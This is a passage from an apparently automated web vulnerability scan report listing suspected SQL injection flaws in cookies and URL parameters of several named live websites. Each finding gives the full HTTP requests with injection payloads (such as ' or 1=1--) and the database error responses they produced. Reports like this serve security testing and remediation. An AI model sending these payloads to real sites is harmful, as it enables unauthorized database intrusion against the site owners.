<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.74. http://www.friedfrank.com/index.cfm [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 21775514'%20or%201%3d1--%20 and 21775514'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Wed, 21-Apr-2010 06:14:17 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.130308879521775514'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.75. http://www.friedfrank.com/index.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 19469349%20or%201%3d1--%20 and 19469349%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d1--%20; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Wed, 21-Apr-2010 06:14:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=11304187519469349%20or%201%3d2--%20; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.76. http://www.friedfrank.com/index.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 13351191'%20or%201%3d1--%20 and 13351191'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 06:13:28 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=42&itemID=729&more=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)13351191'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:13:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="&lt;STRONG&gt;Ianis Girgenson &lt;/STRONG&gt;is an antitrust and competition law associate dividing his time between Fried Frank's London and Paris offices. He joined the Firm in 2006. &lt;BR&gt;&lt;BR&gt;Mr. Girgenson has represented numerous private and listed companies, as well as financial institutions before the European Commission and national authorities in merger control proceedings and in antitrust investigations. He has also been involved in antitrust-related litigation before the EU Court of First Instance and before national courts, including the French Conseil d'Etat.&lt;BR&gt;&lt;BR&gt;Prior to joining the Firm, Mr. Girgenson practiced competition law in Paris and Brussels.">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Girgenson, Ianis </title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></scr
...[SNIP]...

1.77. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forum?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=b88fzzeb72437c112fee69314ce4df5f; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSCDACTQ=MNMDDPPBOGEADHEAEFIHMPPH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...

1.78. http://www.millerwelds.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:38 GMT
Connection: Keep-Alive
Content-Length: 27686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.79. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:58 GMT
Connection: Keep-Alive
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:59 GMT
Connection: Keep-Alive
Content-Length: 22492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...

1.80. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:30 GMT
Connection: Keep-Alive
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.81. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/certifications.html' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:32 GMT
Connection: Keep-Alive
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/about/certifications.html''' at line 1)<br>
...[SNIP]...

1.82. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/certifications.html?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:52 GMT
Connection: Keep-Alive
Content-Length: 14835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/certifications.html?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 16538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

1.83. http://www.millerwelds.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
